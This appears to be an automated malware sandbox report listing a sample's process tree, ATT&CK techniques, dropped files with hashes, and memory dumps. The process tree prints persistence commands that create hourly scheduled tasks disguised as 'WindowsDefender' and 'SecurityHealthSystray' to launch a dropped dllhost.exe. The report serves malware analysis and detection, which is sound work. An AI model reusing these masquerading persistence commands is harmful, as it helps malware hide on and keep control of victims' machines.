- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo фщw7т & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo е6сeQNЮъгLПиKWхs
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo GABВpszЙMТJкx4Л & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo жАdQХьNА
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:336
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1264
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 520
  2⤵
  - Program crash
  PID:4548

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
5a2812b775b17bc721ec808fe46cccdc

SHA1
b186895e093bffa131a3a7f936d75c8314f7ae2f

SHA256
72e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba

SHA512
8693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c891ca43ced02e943067503855e9645b

SHA1
1a0d5746b88cedec4a9bbbba84b2f135da45c0bd

SHA256
cfca594708c46ebacd947a870fb90dfb35a702ae4ff1ac2dbb2da1cda7cda224

SHA512
6a97b8881116d6e56103b6485ab2474c83719489e4a9f79c7179c2729345c400d856142edec725bcc52f5692a52ac4c4a3a02e8b12058bf7044815e46994ced8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8e622a4e8b7b926b6dbed90932fee4db

SHA1
5ff98b190bbe4d9bf0a5491d3b4deba2a6de3eca

SHA256
35a931d5b1ecf36b97a8b9fbda4e3547830ecdb9b7c9747867e2e48570d728de

SHA512
b78ca243c9aa29ad02175df3645f7c4b545cdc6c73f335994a10930a53103ca62b2cd3d058ab333c8a8a77faea328c953412a7ccab660cc234b8eb022903a6ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8e622a4e8b7b926b6dbed90932fee4db

SHA1
5ff98b190bbe4d9bf0a5491d3b4deba2a6de3eca

SHA256
35a931d5b1ecf36b97a8b9fbda4e3547830ecdb9b7c9747867e2e48570d728de

SHA512
b78ca243c9aa29ad02175df3645f7c4b545cdc6c73f335994a10930a53103ca62b2cd3d058ab333c8a8a77faea328c953412a7ccab660cc234b8eb022903a6ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1ffd1a9713cd6c69c925c5e517a460fd

SHA1
a4c012cb20b17dec3db203cbd866d0bddf1ccb2f

SHA256
0eb70a6587a7b1dd7bdc0f33e19cb6e3963f86d17022126484835b491d900753

SHA512
c37d4754aece2d1d5f4c1691217b8b4101ae42016a01df93553c02b1c57c1e6349a2644a65cdab887b73e7fd34d70b748f47c2531b59ba01f962b7f77ae5f561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
bbed704a85bd2d72e45f4dcc34dfdc3c

SHA1
4878d3aaba2ac0855dcd5808cd0be2e48f15deb6

SHA256
95fb9bff23f835d0f64bb5bc3870aafb7d41e4b74e83cd95cf3dce6439e02810

SHA512
85edc1e5545b195b9a66e4ed6dcf6c3bb20a7d5c56e049f3ef41e512e6c28febf2cac324f7fbf3276a6f2f80ae61805d6ddff121021ab0fda90a8bde3f9d1c05

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eojufaqi.vxl.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/864-392-0x0000000000FF0000-0x0000000001006000-memory.dmp

Filesize
88KB

Download
memory/864-747-0x0000000007D30000-0x0000000007D40000-memory.dmp

Filesize
64KB

Download
memory/864-405-0x0000000007D30000-0x0000000007D40000-memory.dmp

Filesize
64KB

Download
memory/1268-834-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/1268-415-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/1268-414-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/1268-1073-0x000000007EBF0000-0x000000007EC00000-memory.dmp

Filesize
64KB

Download
memory/1268-560-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/1268-828-0x0000000006F70000-0x0000000006F80000-memory.dmp

Filesize
64KB

Download
memory/1268-534-0x000000007EBF0000-0x000000007EC00000-memory.dmp

Filesize
64KB

Download
memory/2036-387-0x000000000B890000-0x000000000B8A0000-memory.dmp

Filesize
64KB

Download
memory/2036-129-0x000000000B500000-0x000000000B50A000-memory.dmp

Filesize
40KB

Download
memory/2036-128-0x000000000B610000-0x000000000B6A2000-memory.dmp

Filesize
584KB

Download
memory/2036-127-0x000000000BA10000-0x000000000BF0E000-memory.dmp

Filesize
5.0MB

Download
memory/2036-130-0x000000000B6B0000-0x000000000B716000-memory.dmp

Filesize
408KB

Download
memory/2036-131-0x000000000B890000-0x000000000B8A0000-memory.dmp

Filesize
64KB

Download
memory/2036-120-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2492-1664-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/2516-1660-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/2516-1659-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/2548-407-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/2548-1061-0x000000007F620000-0x000000007F630000-memory.dmp

Filesize
64KB

Download
memory/2548-800-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/2548-527-0x000000007F620000-0x000000007F630000-memory.dmp

Filesize
64KB

Download
memory/2548-795-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/2548-1085-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/2548-406-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/2548-544-0x0000000007220000-0x0000000007230000-memory.dmp

Filesize
64KB

Download
memory/3000-364-0x0000000009C90000-0x0000000009CAA000-memory.dmp

Filesize
104KB

Download
memory/3000-369-0x0000000009C70000-0x0000000009C78000-memory.dmp

Filesize
32KB

Download
memory/3000-134-0x0000000004DF0000-0x0000000004E26000-memory.dmp

Filesize
216KB

Download
memory/3000-135-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/3000-136-0x00000000079F0000-0x0000000008018000-memory.dmp

Filesize
6.2MB

Download
memory/3000-137-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/3000-138-0x00000000078F0000-0x0000000007956000-memory.dmp

Filesize
408KB

Download
memory/3000-139-0x0000000008200000-0x0000000008550000-memory.dmp

Filesize
3.3MB

Download
memory/3000-140-0x00000000080B0000-0x00000000080CC000-memory.dmp

Filesize
112KB

Download
memory/3000-141-0x0000000008B50000-0x0000000008B9B000-memory.dmp

Filesize
300KB

Download
memory/3000-142-0x0000000008940000-0x00000000089B6000-memory.dmp

Filesize
472KB

Download
memory/3000-159-0x00000000097F0000-0x0000000009823000-memory.dmp

Filesize
204KB

Download
memory/3000-160-0x00000000097D0000-0x00000000097EE000-memory.dmp

Filesize
120KB

Download
memory/3000-165-0x0000000009840000-0x00000000098E5000-memory.dmp

Filesize
660KB

Download
memory/3000-166-0x0000000009D30000-0x0000000009DC4000-memory.dmp

Filesize
592KB

Download
memory/3000-169-0x000000007E6D0000-0x000000007E6E0000-memory.dmp

Filesize
64KB

Download
memory/3000-170-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/3528-410-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/3528-1066-0x000000007E3F0000-0x000000007E400000-memory.dmp

Filesize
64KB

Download
memory/3528-411-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/3528-549-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/3528-528-0x000000007E3F0000-0x000000007E400000-memory.dmp

Filesize
64KB

Download
memory/3528-816-0x00000000074A0000-0x00000000074B0000-memory.dmp

Filesize
64KB

Download
memory/3628-1668-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3652-418-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

Filesize
64KB

Download
memory/3652-822-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

Filesize
64KB

Download
memory/3652-1055-0x000000007EBC0000-0x000000007EBD0000-memory.dmp

Filesize
64KB

Download
memory/3652-554-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

Filesize
64KB

Download
memory/3652-525-0x000000007EBC0000-0x000000007EBD0000-memory.dmp

Filesize
64KB

Download
memory/3652-878-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

Filesize
64KB

Download
memory/3652-413-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

Filesize
64KB

Download
memory/3652-515-0x0000000008E60000-0x0000000008F05000-memory.dmp

Filesize
660KB

Download
memory/3684-408-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-1079-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-810-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-805-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-1002-0x000000007EC30000-0x000000007EC40000-memory.dmp

Filesize
64KB

Download
memory/3684-409-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-417-0x0000000008340000-0x000000000838B000-memory.dmp

Filesize
300KB

Download
memory/3684-540-0x0000000006AF0000-0x0000000006B00000-memory.dmp

Filesize
64KB

Download
memory/3684-412-0x0000000007A20000-0x0000000007D70000-memory.dmp

Filesize
3.3MB

Download
memory/4328-1677-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/5044-1672-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download